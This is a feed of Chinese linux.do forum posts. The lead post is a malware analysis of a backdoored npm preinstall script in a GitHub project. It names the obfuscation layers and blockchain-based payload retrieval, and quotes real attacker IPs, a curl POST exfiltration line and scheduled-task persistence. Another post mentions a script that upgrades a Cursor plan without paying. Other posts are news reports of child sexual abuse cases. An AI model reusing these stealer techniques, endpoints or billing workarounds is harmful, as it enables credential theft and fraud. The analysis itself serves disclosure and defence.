标题: 大家用ai看一下自己的项目别被投毒了
作者: #cong yin
板块: #开发调优
编号:
帖子: https://linux.do/t/topic/1834833
时间: 2026-03-27 14:04:58
摘要:
作者: #cong yin
板块: #开发调优
编号:
1834833帖子: https://linux.do/t/topic/1834833
时间: 2026-03-27 14:04:58
摘要:
这个项目被人提交cr有个preinstall.sh,里面会窃取密钥啥的
github.com/hicccc77/WeFlow
preinstall存在后门
已打开 07:53PM - 26 Mar 26 UTC
jstar0
type: bug
priority: critical
preinstall.js:1 先用 Unicode variation selector 隐藏字节,再 eval(...) 执行第一层。
第一层会再做一层 A…ES-256-CBC 解密,然后继续 eval。
第二层不会安装 npm 包;它会去多个 Solana RPC 拉取地址 BjVeAjPrSKFiingBn4vZvghsGj9KCE8AJVtbc9S8o8SC 的最新 memo,把 memo 里的 base64 链接解出来,再按当前 OS 去请求远端 payload。
我实际取到的当前链接是 http://217.69.2.135/NrIgZ6I%2BFyCxXHb%2B9FapRg%3D%3D。其中:
linux 当前返回的是空函数 (() => ""),即目前没下发 Linux 载荷;
darwin 返回约 3.47 MB 的载荷;
win32 返回约 0.55 MB 的载荷。
这意味着它是“远程可变”的恶意安装器:今天拉什么,取决于链上 memo 和服务器返回,不是固定依赖安装。
当前下发的恶意载荷内容
macOS 载荷:我解密后的最终脚本显示,它会窃取 login.keychain-db、Safari/Chrome/Brave/Edge/Firefox 的 Cookies / Login Data / logins.json / key4.db、.ssh、.aws、Apple Notes、本地钱包目录,并打包上传;相关证据可见解密结果里出现的 Library/Keychains/login.keychain-db、Cookies.binarycookies、Login Data、MetaMask、Exodus、Ledger、Trezor、curl -X POST ... http://208.85.20.124/p2p、~/Library/LaunchAgents/com.user.nodestart.plist 等行为。
Windows 载荷:我解密后的最终脚本会创建计划任务和 Run 注册表持久化,隐藏执行 PowerShell,收集浏览器/钱包/VS Code/GitHub 相关数据,压缩后 POST 外发;证据包括 schtasks /create /tn "UpdateApp"、powershell -WindowStyle Hidden、MetaMask、Exodus、Electrum、Login Data、Cookies、http://217.69.3.152:80/log 等。
这已经不是“有风险”,而是典型 信息窃取器 / downloader / persistence 链。
标题: 招行万事达,第一次申请甲骨文就通过
作者: #hanjx
板块: #搞七捻三
编号:
帖子: https://linux.do/t/topic/1834835
时间: 2026-03-27 14:05:08
摘要:
作者: #hanjx
板块: #搞七捻三
编号:
1834835帖子: https://linux.do/t/topic/1834835
时间: 2026-03-27 14:05:08
摘要:
今天上午去办理了万事达,下午申请就通过了。
因为学生身份无法办理visa全币卡,在招行工作人员帮助下办理的万事达普卡(金葵花要五十万门槛),耗时20分钟。
具体申请流程就是关闭代理,使用google无痕浏览登录甲骨文注册,邮箱是@gmail.com,开的是北美凤凰城地区,地址都用中文填写,备用名也就是需要拼音的名字按照名在前,姓在后的习惯写的,其他都如实用中文填写,手机号也是国内手机号,然后就通过啦。(看到这个跑道图出来的时候都感觉这就没啦?)
和其他甲骨文注册教程里不一样,我填地址时候并没有按照办卡时填写的地址写,办卡时用的是家庭地址,填甲骨文的时候是工作地址,且都是中文填写。确实比较玄学。
标题: 天才程序员陨落!!!! 挽救team!!!
作者: #sevensw
板块: #搞七捻三
编号:
帖子: https://linux.do/t/topic/1834846
时间: 2026-03-27 14:06:45
摘要:
作者: #sevensw
板块: #搞七捻三
编号:
1834846帖子: https://linux.do/t/topic/1834846
时间: 2026-03-27 14:06:45
摘要:
天才程序员要陨落了。 目前还有什么卡头可以开team,请各位大佬集思广益,并分享一下渠道
标题: 性侵6岁表妹长达五年 22岁表哥判监10年鞭24下
作者: #李白
板块: #前沿快讯
编号:
帖子: https://linux.do/t/topic/1834848
时间: 2026-03-27 14:06:52
摘要:
作者: #李白
板块: #前沿快讯
编号:
1834848帖子: https://linux.do/t/topic/1834848
时间: 2026-03-27 14:06:52
摘要:
女童白天交由亲戚照顾,自6岁起便被年长4岁的表哥性侵。她首次向家人求助时反被亲戚指责撒谎,直至受害约五年后再度说出实情,父母才停止“送羊入虎口”,表哥的恶行才被制止。
两家人事后若无其事般继续往来,女童父母为她办12岁生日派对时还邀请表哥出席。女童后来无意间读到一则女子被强奸的新闻报道,才恍然发现自己也是性罪案受害人。
她最终决定不再顾及亲情,报案揭发了表哥的罪行。
目前22岁的表哥早前在高庭受审后被判罪成,星期二(3月10日)被判坐牢10年和24下鞭刑。
被告面对三项控状,指他在2016年至2018年之间,强奸和性侵当时8岁至10岁的受害人。被告是受害人的姑姑与姑丈领养的儿子,与受害人没有血缘关系。为了保护受害人,媒体无法报道任何可能泄露受害人身份的信息,包括被告的名字。
审讯揭露,受害人自小会在白天被带到姑姑的四层楼洋房住家,交由祖母照顾,父母亲会在晚上到洋房把她接回家。受害人的两个弟弟出生后,也接受同样的看顾安排。
控方指被告从2013年起,即本案控状中的罪行发生之前,就开始性侵犯年仅6岁的受害人,平均每周一次在洋房的主人卧室内进行。被告当时只有10岁。
受害人供证时说,她在主人房或其他卧室做功课时,被告会突然走进房间,把她抱到主人房床上,对她做出各种性行为。由于主人房里安装了闭路电视荧幕,可观察洋房其他角落的动静,被告一旦发现有人靠近主人房就会赶紧停止犯案。
被告也警告受害人,不准把发生的事情告诉任何人,他甚至骗受害人说,他所做的事情对受害人“有益”。
2016年至2017年之间,受害人向女佣透露被告乱摸她,家人知情后赶紧召开家庭会议,但被告否认伸出狼爪,受害人的姑姑也指责受害人撒谎。家人选择相信被告,继续让受害人在白天前往洋房。被告过后不仅没有停止犯案,还更频密地找机会性侵犯受害人,并且警告受害人,“你这次最好别跟其他人说”。
本案三项控状的罪行,全发生在第一次家庭会议之后。
2017年底至隔年1月,受害人向另一名女佣求助,家人再度召开紧急会议,被告当时恐吓跳楼自杀以示清白。这一回,受害人的双亲终于停止让儿女放学后去姑姑的洋房,被告的犯
标题: Mac 移动硬盘相关问题,我的存储空间到哪去了??
作者: #ChinaRan404
板块: #开发调优
编号:
帖子: https://linux.do/t/topic/1834850
时间: 2026-03-27 14:07:31
摘要:
作者: #ChinaRan404
板块: #开发调优
编号:
1834850帖子: https://linux.do/t/topic/1834850
时间: 2026-03-27 14:07:31
摘要:
1Tb 的硬盘
分了 950G 给 Mac 自己用(APFS 格式)
分了 50G 作为与 Windows、Linux 数据交换用
Data 磁盘为主要的数据存储磁盘
显示已使用:894.95 GB
但是我只用了162G 左右啊?
有没有佬知道是为啥,不会是硬盘废了吧
标题: 关于cursor ultra
作者: #ares.andy
板块: #开发调优
编号:
帖子: https://linux.do/t/topic/1834855
时间: 2026-03-27 14:08:06
摘要:
作者: #ares.andy
板块: #开发调优
编号:
1834855帖子: https://linux.do/t/topic/1834855
时间: 2026-03-27 14:08:06
摘要:
用之前的办法,先开通pro,然后执行脚本升级到ultra,目前看好像还能用。这cursor会把多余的账单,秋后算帐吗
标题: alphaXiv上模型数量减少
作者: #LiuJiXin
板块: #开发调优
编号:
帖子: https://linux.do/t/topic/1834869
时间: 2026-03-27 14:09:35
摘要:
作者: #LiuJiXin
板块: #开发调优
编号:
1834869帖子: https://linux.do/t/topic/1834869
时间: 2026-03-27 14:09:35
摘要:
刚准备开始看今天的论文,结果发现claude sonnet4.6没了,gemini 3.1pro也没了。啥情况啊,谁逆向alphaXiv了吗?我读个论文容易吗
标题: team的子号现在会陨落吗?另外查看子号邮件意外发现大善人给我开源项目的审批通过了
作者: #liuyd
板块: #搞七捻三
编号:
帖子: https://linux.do/t/topic/1834872
时间: 2026-03-27 14:09:55
摘要:
作者: #liuyd
板块: #搞七捻三
编号:
1834872帖子: https://linux.do/t/topic/1834872
时间: 2026-03-27 14:09:55
摘要:
标题: 如今Team 拉闸,订阅plus 来使用codex跟Team额度差的多吗?
作者: #jasonli
板块: #搞七捻三
编号:
帖子: https://linux.do/t/topic/1834874
时间: 2026-03-27 14:10:21
摘要:
作者: #jasonli
板块: #搞七捻三
编号:
1834874帖子: https://linux.do/t/topic/1834874
时间: 2026-03-27 14:10:21
摘要:
在网上查询一圈,各执其词,最终搜到这个比较明确的结果 不知道准不准,有没有订阅plus佬友对比过team和plus的额度差距,要是相差不大就订阅plus了,要是几乎没几次 还得另寻他法了。
标题: Claude Code 2.1.8x版本Token消耗多的问题是真的吗?
作者: #leilei0628
板块: #开发调优
编号:
帖子: https://linux.do/t/topic/1834879
时间: 2026-03-27 14:10:46
摘要:
作者: #leilei0628
板块: #开发调优
编号:
1834879帖子: https://linux.do/t/topic/1834879
时间: 2026-03-27 14:10:46
摘要:
听说Claude Code 2.1.81版本存在缓存创建异常问题导致上下文无法命中,Token消耗多几倍,各位佬知不知道这个是不是真的?
标题: team车是否已经全部拉闸?
作者: #羊羊羊🐑
板块: #前沿快讯
编号:
帖子: https://linux.do/t/topic/1834880
时间: 2026-03-27 14:11:13
摘要:
作者: #羊羊羊🐑
板块: #前沿快讯
编号:
1834880帖子: https://linux.do/t/topic/1834880
时间: 2026-03-27 14:11:13
摘要:
openai gpt的team车 是不是全部都拉闸了 家人们 出来聊聊
标题: 公司访问L站这样了
作者: #yomi
板块: #搞七捻三
编号:
帖子: https://linux.do/t/topic/1834890
时间: 2026-03-27 14:12:17
摘要:
作者: #yomi
板块: #搞七捻三
编号:
1834890帖子: https://linux.do/t/topic/1834890
时间: 2026-03-27 14:12:17
摘要:
咋回事 有人遇到吗
标题: 与13岁男学生交往并性侵 前数学女教师分手后仍纠缠判监22个月
作者: #李白
板块: #前沿快讯
编号:
帖子: https://linux.do/t/topic/1834892
时间: 2026-03-27 14:12:24
摘要:
作者: #李白
板块: #前沿快讯
编号:
1834892帖子: https://linux.do/t/topic/1834892
时间: 2026-03-27 14:12:24
摘要:
前小学女教师在男学生毕业后仍与他保持联系,并在男生13岁时与他交往,期间多次在车内及楼梯间与对方发生性行为。后来,男生提出分手,女教师多次试图挽回感情,跟踪并频繁致电及发电邮骚扰对方。
现年35岁的女被告共面对四项包括性侵、抵触儿童与青少年法令,以及防止骚扰法令的控状。她在星期四(3月26日)承认其中两项,法官在余项纳入考量后,判她入狱22个月。
为保护受害人,媒体不得报道任何可能泄露他身份的信息,包括被告的姓名。
根据案情,2016年至2017年期间,被告是受害人小五和小六的数学老师。受害人小学毕业后,两人仍持续保持联系。受害人在课业上遇到困难时,会向被告求助,而他与同学回母校探访时,也会顺道拜访被告。
2018年底,被告与受害人频繁通过短信联系,偶尔也会相约见面,关系逐渐亲密。2019年2月,当时28岁的被告与年仅13岁的受害人展开恋情。交往期间,就读中二的受害人缺钱时,被告会给他零用钱,让他购买食物或支付交通费用。
2019年2月20日至10月8日期间,被告会开车载受害人到他家附近停车场,并把车停在偏僻位置,两人在车内拥抱和亲吻。同年11月至12月间,两人的举止越来越亲昵,开始在车内裸露,被告也会为受害人口交。两人也会在停车场楼梯间亲热。
两人的恋情维持约四年后,受害人在2023年7月提出分手。被告哭诉自己仍然爱着受害人,希望挽回这段感情,但受害人执意分手,并在各社媒上拉黑被告,要求她不要再联系自己。
然而,2024年1月16日至3月7日期间,被告不仅多次跟踪受害人,还拨打约25通电话,并发送17封电邮骚扰他,在电邮中指责受害人伤害和背叛她、对后者有新欢表示不满,表达思念和希望复合等。
受害人不堪其扰,在3月7日报警。被告在同一天被捕。
控方指出,被告与受害人相差15岁,被告明知与前学生交往并不恰当,在案发期间多次与受害人发生亲密行为,促请法官判处她坐牢22至26个月。
被告律师求情时说,两人是在受害人小学毕业两年后才开始交往,被告当时已不再是受害人的老师,因此没有违反师生信任关系,恳请法官从轻发落。
教育部早前答复《联合早报》询问时说,被
标题: 午睡起来天塌了~,美区订阅的claude 5x被 封了
作者: #shufu.yes
板块: #搞七捻三
编号:
帖子: https://linux.do/t/topic/1834905
时间: 2026-03-27 14:13:53
摘要:
作者: #shufu.yes
板块: #搞七捻三
编号:
1834905帖子: https://linux.do/t/topic/1834905
时间: 2026-03-27 14:13:53
摘要:
3月9号美区付费的claude max 5x今天被封了,用了接近20天,睡觉前还让他帮我写个程序,没想到美美的午觉后,一坐在电脑前,收到龙虾的 LLM request rejected: This organization has been disabled. ,真是不知道要怎么给claude送钱好了, 心累
标题: 帮我看看女神给我发了这个是啥意思
作者: #smzd
板块: #搞七捻三
编号:
帖子: https://linux.do/t/topic/1834910
时间: 2026-03-27 14:14:25
摘要:
作者: #smzd
板块: #搞七捻三
编号:
1834910帖子: https://linux.do/t/topic/1834910
时间: 2026-03-27 14:14:25
摘要:
标题: az +1 :xhs_039:
作者: #img
板块: #开发调优
编号:
帖子: https://linux.do/t/topic/1834926
时间: 2026-03-27 14:15:48
摘要:
作者: #img
板块: #开发调优
编号:
1834926帖子: https://linux.do/t/topic/1834926
时间: 2026-03-27 14:15:48
摘要: